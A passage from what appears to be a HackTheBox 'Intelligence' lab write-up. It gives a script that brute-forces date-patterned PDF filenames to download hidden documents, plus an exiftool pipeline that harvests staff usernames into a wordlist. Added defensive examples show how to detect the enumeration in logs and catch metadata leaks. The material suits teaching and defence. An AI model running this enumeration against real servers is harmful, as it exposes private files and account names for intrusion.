PDF File Naming Convention


The 2 PDF files available from the target web server appear to have a consistent naming structure, which suggests the possibility of a naming convention for PDF files: <YEAR>-<MONTH>-<DATE>-upload.pdf

Although fuzzing could be an efficient method to validate the theory, manually inspecting the entire annual cycle would be an exceedingly time-intensive process. Therefore, I will automate the process by creating a simple script.

Fuzzer


#!/usr/bin/python3
import requests, os
 
# Define the year for the PDF filename
year = 2020
 
# Define the range of months
months = range(1,13)
 
# Define the range of dates
dates = range(1,32)
 
# Loop through the months and dates
for m in months:
    for d in dates:
        # Create the filename using the year, month, and date
        filename = f"{year}-{m:02d}-{d:02d}-upload.pdf"
 
        # Create the URL for the file
        url = f"http://dc.intelligence.htb/documents/{filename}"
 
        # Send a GET request to the URL
        response = requests.get(url)
 
        # Check if the file exists on the server
        if response.status_code == 404:
            continue
        elif response.status_code == 200:
            # Check if the file already exists in the local directory
            if os.path.exists(filename):
                print(f"File '{filename}' already exists. Skipping download.")
                continue
            else:
                with open(filename, 'wb') as f:
                    f.write(response.content)
                print(f"Downloaded '{filename}' successfully.")

This Python script automates the process of downloading PDF files by iterating through months and dates in the year 2020. It constructs filenames based on the specified date format and attempts to download these files from a web server. If a file exists on the server (status code 200), it checks if it already exists locally and downloads it if not. The script helps efficiently retrieve PDFs from the server following a date-based naming convention.
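Seen from the server side, the loop above leaves a distinctive trace: one client requesting many date-patterned names, mostly answered with 404, including calendar dates that cannot exist (the 1..31 range is applied to every month). The following is an added example, not part of the original write-up, that flags this pattern in an access log; the combined log format, the thresholds and the sample lines are assumptions constructed for illustration.

```python
import re
from collections import defaultdict
from datetime import date

# Matches combined-log-format GETs for /documents/<YEAR>-<MONTH>-<DATE>-upload.pdf
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "GET /documents/'
    r'(?P<y>\d{4})-(?P<m>\d{2})-(?P<d>\d{2})-upload\.pdf HTTP/[\d.]+" (?P<status>\d{3}) ')

def is_real_date(y, m, d):
    """False for dates such as 2020-02-30, which only a blind 1..31 loop requests."""
    try:
        date(y, m, d)
        return True
    except ValueError:
        return False

def find_enumerators(lines, min_distinct=20, min_miss_ratio=0.5):
    """Return {ip: stats} for clients that walk the date-based name space."""
    seen = defaultdict(lambda: {"names": set(), "total": 0, "misses": 0, "impossible": 0})
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue
        s, ymd = seen[m["ip"]], (int(m["y"]), int(m["m"]), int(m["d"]))
        s["names"].add(ymd)
        s["total"] += 1
        s["misses"] += m["status"] == "404"
        s["impossible"] += not is_real_date(*ymd)
    flagged = {}
    for ip, s in seen.items():
        ratio = s["misses"] / s["total"]
        if len(s["names"]) >= min_distinct and (ratio >= min_miss_ratio or s["impossible"]):
            flagged[ip] = {"distinct": len(s["names"]), "miss_ratio": round(ratio, 2),
                           "impossible_dates": s["impossible"]}
    return flagged

def sample_log():
    """Constructed log: one client walks 2020-02-01..31, another fetches two real files."""
    fmt = '{ip} - - [01/Jul/2021:10:00:{d:02d} +0000] "GET /documents/2020-02-{d:02d}-upload.pdf HTTP/1.1" {st} 0 "-" "-"'
    existing = {3, 17}  # constructed: days on which a file exists
    lines = [fmt.format(ip="192.0.2.10", d=d, st=200 if d in existing else 404) for d in range(1, 32)]
    lines += [fmt.format(ip="198.51.100.7", d=d, st=200) for d in sorted(existing)]
    return lines

if __name__ == "__main__":
    print(find_enumerators(sample_log()))
```

Requests for impossible dates are the cheapest signal here, since no legitimate link on the site would ever point to them.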

Fuzzing


┌──(kali㉿kali)-[~/…/htb/labs/intelligence/pdf]
└─$ python3 fuzzing_pdf.py                                               
Downloaded '2020-01-01-upload.pdf' successfully.
 
[...REDACTED...]
 
Downloaded '2020-12-30-upload.pdf' successfully.
 
┌──(kali㉿kali)-[~/…/htb/labs/intelligence/pdf]
└─$ ll *.pdf | wc -l            
84

Running the Python script confirms the theory, as there were a total of 82 additional PDF files within the /documents directory of the web server.

Reviewing the additional 82 PDF files one by one would also be a highly time-intensive task. Given the impracticality of reviewing these 82 files individually, I create a separate, user-friendly Python script to streamline and automate the process, ensuring efficiency and thoroughness.

Metadata


┌──(kali㉿kali)-[~/…/htb/labs/intelligence/pdf]
└─$ exiftool *.pdf | grep -i creator                    
Creator                         : William.Lee
Creator                         : Scott.Scott
Creator                         : Jason.Wright
Creator                         : Veronica.Patel
Creator                         : Jennifer.Thomas
Creator                         : Danny.Matthews
Creator                         : David.Reed
Creator                         : Stephanie.Young
Creator                         : Daniel.Shelton
Creator                         : Jose.Williams
Creator                         : John.Coleman
Creator                         : Jason.Wright
Creator                         : Jose.Williams
Creator                         : Daniel.Shelton
Creator                         : Brian.Morris
Creator                         : Jennifer.Thomas
Creator                         : Thomas.Valenzuela
Creator                         : Travis.Evans
Creator                         : Samuel.Richardson
Creator                         : Richard.Williams
Creator                         : David.Mcbride
Creator                         : Jose.Williams
Creator                         : John.Coleman
Creator                         : William.Lee
Creator                         : Anita.Roberts
Creator                         : Brian.Baker
Creator                         : Jose.Williams
Creator                         : David.Mcbride
Creator                         : Kelly.Long
Creator                         : John.Coleman
Creator                         : Jose.Williams
Creator                         : Nicole.Brock
Creator                         : Thomas.Valenzuela
Creator                         : David.Reed
Creator                         : Kaitlyn.Zimmerman
Creator                         : Jason.Patterson
Creator                         : Thomas.Valenzuela
Creator                         : David.Mcbride
Creator                         : Darryl.Harris
Creator                         : William.Lee
Creator                         : Stephanie.Young
Creator                         : David.Reed
Creator                         : Nicole.Brock
Creator                         : David.Mcbride
Creator                         : William.Lee
Creator                         : Stephanie.Young
Creator                         : John.Coleman
Creator                         : David.Wilson
Creator                         : Scott.Scott
Creator                         : Teresa.Williamson
Creator                         : John.Coleman
Creator                         : Veronica.Patel
Creator                         : John.Coleman
Creator                         : Samuel.Richardson
Creator                         : Ian.Duncan
Creator                         : Nicole.Brock
Creator                         : William.Lee
Creator                         : Jason.Wright
Creator                         : Travis.Evans
Creator                         : David.Mcbride
Creator                         : Jessica.Moody
Creator                         : Ian.Duncan
Creator                         : Jason.Wright
Creator                         : Richard.Williams
Creator                         : Tiffany.Molina
Creator                         : Jose.Williams
Creator                         : Jessica.Moody
Creator                         : Brian.Baker
Creator                         : Anita.Roberts
Creator                         : Teresa.Williamson
Creator                         : Kaitlyn.Zimmerman
Creator                         : Jose.Williams
Creator                         : Stephanie.Young
Creator                         : Samuel.Richardson
Creator                         : Tiffany.Molina
Creator                         : Ian.Duncan
Creator                         : Kelly.Long
Creator                         : Travis.Evans
Creator                         : Ian.Duncan
Creator                         : Jose.Williams
Creator                         : David.Wilson
Creator                         : Thomas.Hall
Creator                         : Ian.Duncan
Creator                         : Jason.Patterson

I have also extracted potential users from the Creator field of the metadata of all the PDF files.

┌──(kali㉿kali)-[~/…/htb/labs/intelligence/pdf]
└─$ exiftool *.pdf | grep -i creator | cut -d ':' -f2 | tr '[:upper:]' '[:lower:]' | tr -d '[:blank:]' | sort -u > ../creator_users.txt

I will sort them and save all to a file: creator_users.txt
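The Creator values above reach the public because nothing checks document metadata before upload. The following is an added example, not part of the original write-up, of a pre-publication check that reads the Creator, Author and Producer fields from a PDF and flags values shaped like First.Last account names. It assumes the Info dictionary is stored uncompressed and unencrypted; the sample PDF bytes and names are constructed.

```python
import re

# Assumption: Info entries appear in the raw file as a literal string "(...)" or a
# hex string "<...>". Object streams, encryption and nested parentheses are not handled.
FIELD_RE = re.compile(
    rb"/(Creator|Author|Producer)\s*"
    rb"(?:\((?P<lit>(?:\\.|[^\\()])*)\)|<(?P<hex>[0-9A-Fa-f\s]*)>)")
USERNAME_RE = re.compile(r"^[A-Za-z]+\.[A-Za-z]+$")  # First.Last, as in the Creator output

def decode_pdf_string(lit, hexs):
    """Decode a PDF literal or hex string to text (PDFDocEncoding treated as latin-1)."""
    if hexs is not None:
        h = re.sub(rb"\s", b"", hexs).decode("ascii")
        raw = bytes.fromhex(h + ("0" if len(h) % 2 else ""))  # odd length is zero-padded
    else:
        raw = re.sub(rb"\\(.)", rb"\1", lit)  # drops the backslash; octal escapes not handled
    if raw.startswith(b"\xfe\xff"):           # UTF-16BE byte-order mark
        return raw[2:].decode("utf-16-be", "replace")
    return raw.decode("latin-1")

def audit_pdf_bytes(data):
    """Return [(field, value, looks_like_username)] for every metadata entry found."""
    findings = []
    for m in FIELD_RE.finditer(data):
        value = decode_pdf_string(m["lit"], m["hex"])
        findings.append((m[1].decode(), value, bool(USERNAME_RE.match(value))))
    return findings

def username_leaks(data):
    """Values that should block publication until the metadata is stripped."""
    return [value for _, value, hit in audit_pdf_bytes(data) if hit]

# Constructed sample: a minimal PDF-like byte string with hypothetical names.
SAMPLE_PDF = (
    b"%PDF-1.5\n1 0 obj\n<< /Creator (Jane.Doe) /Producer (ExampleTool 1.0) >>\nendobj\n"
    b"2 0 obj\n<< /Author <FEFF004A002E0044006F0065> >>\nendobj\n%%EOF\n")

if __name__ == "__main__":
    for field, value, hit in audit_pdf_bytes(SAMPLE_PDF):
        print(f"{field:9} {value!r:20} {'BLOCK' if hit else 'ok'}")
```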